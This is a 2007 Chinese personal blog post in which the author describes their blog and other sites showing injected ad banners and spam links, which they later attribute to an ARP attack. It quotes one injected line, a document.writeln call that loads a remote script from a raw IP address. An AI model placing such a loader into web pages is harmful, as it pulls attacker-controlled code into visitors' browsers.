关于以前对广大阅读者所造成的误导,俺深表歉意!
公元2007年12月11日,也就是今天。大约是在中午13:20分左右,俺打开俺的博客一看,那叫触目惊心啊:所有网页的最上头,赫然显示着一块“google提供的广告”,粉紫色的,728×90横幅。俺当时还是感觉相当震惊啊,刚才还好好的,怎么突然就不行了呢?
俺也是没经验,当时相当的办法是:先进后台重建文件,如果不行就上传一份以前的备份完全覆盖。结果,当俺以龟速进入zblog后台的时候,赫然发现:连后台都有那个噩梦般的粉紫色“google提供的广告”!!!
然后,俺立即联系主机客服(有必要在这儿做广告么?),说明了问题。这时俺又刷新了页面,发现一切正常!!!刚才的那些乌七八糟的东西荡然无存!
客服说:没事,这就是正常的arp攻击……
当时没截图,可惜了。不过俺当时另存了一下俺自己的网页,还是可以研究的。
当时那个ad,差不多就是这样,不过边框更粗一些,颜色更紫一些。
俺又看了看保存的内容,嗬,Ads.htm,ads_002.htm,ads_003.htm,什么googlead阿里妈妈的都有,还有些“玉清北京演唱会”“专业音响 音响灯光工程”“一生必做一次的爱情测试”之类的链接——不过当时俺都没看到,估计是还没来的几载入吧。
另外,发现这么一段代码:
document.writeln("<script type=\"text\/javascript\" src = \"http:\/\/121.15.220.104\/52gxy\/00.asp\"><\/script>")
这个“121.15.220.104”是广州的一个ip。
另外,还有一个id为675882的“站长统计”。(俺说了这些东西不会被黑客们盯上吧?怕怕!)
好了,进入正题。为啥俺说“国内众多网站遭受攻击”呢?因为俺同学通报:今天中午浏览的很多网站,都出现了同一症状。比如tom汽车的一个网页,注意,这是tom.com,大网站啊!
另外,当时俺急着上51la看情况,结果发现51啦不能访问!晚上登陆,看见这么一行字:
提醒: 尊贵的用户,因网络维护,当前统计报表中不包含12月11日13:20~18:30的数据,望谅解。
难道51拉也遭受了攻击?我要拉这么不稳定,俺准备用雅虎统计了。
另外,前几天校内的页首广告位置也出现过类似样子的google广告框,不知道是不是正常现象。
******现在俺知道,当时出现的广告框,应该都是局域网ARP导致的。参见:ARP攻击相关知识
